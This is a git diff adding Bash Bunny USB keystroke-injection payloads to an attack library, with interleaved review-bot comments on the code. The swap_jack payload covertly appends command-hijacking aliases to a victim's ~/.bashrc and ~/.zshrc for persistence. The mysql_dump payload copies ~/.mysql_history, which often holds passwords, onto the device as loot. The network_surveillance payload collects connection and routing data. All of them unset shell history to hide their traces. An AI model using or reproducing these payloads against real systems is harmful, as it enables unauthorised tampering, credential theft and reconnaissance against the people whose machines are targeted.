+swap_array='alias ls=\"du\" \\n alias cd=\"dh\" \\n alias cat=\"lsblk\"'
+
+echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"$swap_array\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"$swap_array\" >> ~/.bashrc\nfi" > /tmp/tmmmp
+
+chmod +x /tmp/tmmmp && cd ~/ && /tmp/tmmmp && rm /tmp/tmmmp && exit
diff --git a/payloads/library/execution/swap_jack/payload.txt b/payloads/library/execution/swap_jack/payload.txt
new file mode 100644
index 000000000..1bc85ab53
--- /dev/null
+++ b/payloads/library/execution/swap_jack/payload.txt
@@ -0,0 +1,53 @@
+# Title: swap_jack
+# Description: swap_jack, simple yet powerful payload which can be used to replace one command with another on target’s system.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution.
+# Target: GNU/Linux.
+# Attackmodes: HID, STORAGE.
+
+LED SETUP
+ATTACKMODE STORAGE
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk'
+Q ENTER
+Q DELAY 2000
+Q STRING lmnt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$lmnt'/payloads/library/swap_jack/payload.sh /tmp/system
+Q ENTER
+Q STRING chmod +x /tmp/system
+Q ENTER
+Q STRING /tmp/./system
+Q ENTER
+Q DELAY 300
+Q STRING rm /tmp/system
+Q ENTER
+Q DELAY 500
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+#Q STRING exit
+Q ENTER
+LED FINISH
diff --git a/payloads/library/exfiltration/mysql_dump/README.md b/payloads/library/exfiltration/mysql_dump/README.md
new file mode 100644
index 000000000..4a91a7d77
--- /dev/null
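Review bot: swap_jack/payload.sh has no header comment, and the README's "Persistent" feature should be made concrete here: the generated `/tmp/tmmmp` script appends the `$swap_array` alias line to `~/.zshrc` and `~/.bashrc`, so the swapped commands survive the terminal closing and every later shell, and undoing it means editing those two files. A header listing the rc-file modification and the transient `/tmp/tmmmp` is what a lab operator and a responder both need. Note also that the `ls -a | grep 'zshrc'` checks in the generated script test the current directory, which only works because the last line does `cd ~/` before running it — worth a comment, since a reader of the script alone would expect `~/`.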
+++ b/payloads/library/exfiltration/mysql_dump/README.md
@@ -0,0 +1,33 @@
+## About:
+* Title: mysql_dump
+* Description: mysql_dump, a payload used to exfiltrate mysql history. Looting mysql history can be useful understanding targets database schema.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Exfiltaration
+* Target: Unix-like operating systems.
+* Attackmodes: HID, Storage
+
+## mysql_dump: mysql_dump payload exfiltrates MySQL history, which can be used to understand targets database schema..
+
+### Workflow:
+1. Prevent storing history.
+2. Fetching BashBunny's block device.
+3. Mounting BashBunny.
+4. Looting mysql_history keys.
+5. Unmounting BashBunny.
+
+### LED Status:
+* `SETUP` : MAGENTA
+* `ATTACK` : YELLOW
+* `FINISH` : GREEN
+
+### Directory Structure of payload components:
+| FileName | Directory |
+| -------------- | ----------------------------- |
+| payload.txt | /payloads/switch1/ |
+| payload.sh | /payloads/library/mysql_dump/ |
+
+* Note: Create directory named `mysql_dump` in `/payloads/library/`
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/exfiltration/mysql_dump/payload.sh b/payloads/library/exfiltration/mysql_dump/payload.sh
new file mode 100644
index 000000000..2d1497889
--- /dev/null
+++ b/payloads/library/exfiltration/mysql_dump/payload.sh
@@ -0,0 +1,7 @@
+#!/bin/sh
+disk=$(lsblk -fs | grep BashBunny | awk '{print $1}')
+lmnt=$(lsblk | grep $disk | awk '{print $7}')
+ls -a ~/ | grep -w '.mysql_history' &> /dev/null
+if [ $? = 0 ]; then
+ cp -r ~/.mysql_history $lmnt/loot/$(whoami)-mysql_history.txt
+fi
diff --git a/payloads/library/exfiltration/mysql_dump/payload.txt b/payloads/library/exfiltration/mysql_dump/payload.txt
new file mode 100644
index 000000000..56779a323
--- /dev/null
+++ b/payloads/library/exfiltration/mysql_dump/payload.txt
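Review bot: mysql_dump/payload.sh copies `~/.mysql_history` in clear text to `$lmnt/loot/$(whoami)-mysql_history.txt`, and a MySQL history routinely contains statements such as `CREATE USER ... IDENTIFIED BY '...'` or `SET PASSWORD`, so the file on the Bunny's storage is credential material, not just the "database schema" the README describes. A header comment should say so, so that loot handling on the engagement side (encryption at rest, retention, what goes into the report) is decided deliberately rather than discovered later. The file also declares `#!/bin/sh` but uses the bash-only `&>` redirection, and `$lmnt` is unquoted in the `cp` target; the `grep -w '.mysql_history'` pattern treats the leading `.` as a regex wildcard.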
@@ -0,0 +1,53 @@
+# Title: mysql_dump
+# Description: mysql_dump, a payload used to exfiltrate mysql history. Looting mysql history can be useful understanding targets database schema.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Exfiltaration.
+# Target: GNU/Linux.
+# Attackmodes: HID, Storage.
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk'
+Q ENTER
+Q DELAY 2000
+Q STRING lmnt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$lmnt'/payloads/library/mysql_dump/payload.sh /tmp/
+Q ENTER
+Q STRING chmod +x /tmp/payload.sh
+Q ENTER
+Q STRING /tmp/./payload.sh
+Q ENTER
+Q DELAY 1500
+Q STRING rm /tmp/payload.sh
+Q ENTER
+Q DELAY 500
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH
diff --git a/payloads/library/exfiltration/network_surveillance/README.md b/payloads/library/exfiltration/network_surveillance/README.md
new file mode 100644
index 000000000..6b986e6da
--- /dev/null
+++ b/payloads/library/exfiltration/network_surveillance/README.md
@@ -0,0 +1,22 @@
+## About:
+* Title: network_surveillance
+* Description: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Exfiltaration
+* Target: Unix-like operating systems.
+* Attackmodes: HID.
+
+## network_surveillance: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
+
+### Workflow:
+1. Mounting Bunny.
+2. Executing Terminal Emulator.
+3. Prevent storing history.
+4. Storing script in target’s system
+5. Granting execution privilege.
+6. Transferring loot.
+7. Unmounting Bunny.
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/exfiltration/network_surveillance/payload.txt b/payloads/library/exfiltration/network_surveillance/payload.txt
new file mode 100644
index 000000000..c0081c4a4
--- /dev/null
+++ b/payloads/library/exfiltration/network_surveillance/payload.txt
@@ -0,0 +1,46 @@
+# Title: network_surveillance
+# Description: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Exfiltration.
+# Target: GNU/Linux.
+# Attackmodes: HID, Storage.
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk'
+Q ENTER
+Q DELAY 2000
+Q STRING lmnt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [Looting]
+Q STRING netstat -antup \>\> '$lmnt/loot/$(whoami)-network_surveillance' \&\& netstat -nlp \>\> '$lmnt/loot/$(whoami)-network_surveillance'
+Q ENTER
+Q DELAY 1000
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH
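Review bot: The `# [Looting]` line depends on `netstat`, which ships in net-tools and is, as far as I know, no longer installed by default on a number of current GNU/Linux distributions, so `# Target: GNU/Linux.` overstates reach; the header or README should list net-tools as a requirement, and note that `netstat -p` reports process names only for the invoking user's sockets unless run as root, so the loot from an unprivileged session is partial. The README's workflow lists "Storing script in target's system" and "Granting execution privilege", but this payload stores no script and types a single `netstat` pipeline, so those steps should be removed from the README. The header's `# Attackmodes: HID, Storage.` is correct for a payload that mounts the Bunny; the README's `Attackmodes: HID.` is the one that is wrong.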